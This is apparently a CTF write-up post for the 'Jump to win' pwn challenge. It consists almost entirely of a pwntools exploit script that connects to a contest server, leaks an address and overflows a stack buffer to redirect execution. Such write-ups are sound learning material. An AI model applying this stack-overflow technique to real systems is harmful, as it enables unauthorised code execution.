
Pwn Jump to win

JUMP_TO_WIN

Exploit script

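from pwn import *

# Load the challenge binary and set the pwntools context from it
elf = context.binary = ELF('./jump_to_win')

# For local testing, use instead: p = elf.process()
p = remote('ctf-metared-2021.ua.pt', 26656)

# Discard the initial prompt
p.recv()

# First input: 64 bytes of padding followed by the 8-byte value 0x4155
payload = b'A' * 64
payload += p64(0x4155)
p.sendline(payload)

# Parse the eighth-from-last whitespace-separated token of the response
# as a hexadecimal address
vuln_addr = int(p.recv().decode('latin-1').split()[-8], 16)

# Second input: 40 bytes of padding followed by the parsed address, written twice
payload = b'A' * 40
payload += p64(vuln_addr)
payload += p64(vuln_addr)

p.sendline(payload)
p.interactive()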
This post is licensed under CC BY 4.0 by the author.